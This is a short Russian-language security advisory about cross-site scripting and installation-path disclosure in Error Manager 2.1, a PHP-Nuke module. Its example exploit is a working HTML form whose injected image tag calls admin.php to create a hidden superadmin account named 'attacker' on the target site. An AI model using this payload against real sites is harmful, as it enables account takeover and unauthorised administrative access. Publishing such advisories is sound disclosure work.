Security Lab

Несколько уязвимостей в Error Manager

Дата публикации:20.03.2004
Всего просмотров:1241
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие системных данных
Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Error Manager 2.x
Уязвимые версии: Error Manager 2.1

Описание: Несколько уязвимостей обнаружено в Error Manager. Удаленный пользователь может выполнить XSS нападение и определить инсталляционный путь.

1. XSS

http://localhost/nuke71/error.php?pagetitle=[xss code here]

http://localhost/nuke71/error.php?error=>[xss code here]
1. Определение пути:
http://localhost/nuke71/error.php?newlang=foobar

Пример/Эксплоит:

<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>

<FORM action="http://www.victim.com/error.php" method="POST">

<input type="hidden" name="error" value="<img width='0' height='0' bor
der='0' src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&a
dd_pwd=coolpass&add_email=kala@hot.ee&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">

</FORM>

</center>
<br><br><br>

</BODY>
</HTML>

URL производителя: http://www.gijza.net/downloads-cat-1.html

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple vulnerabilities in Error Manager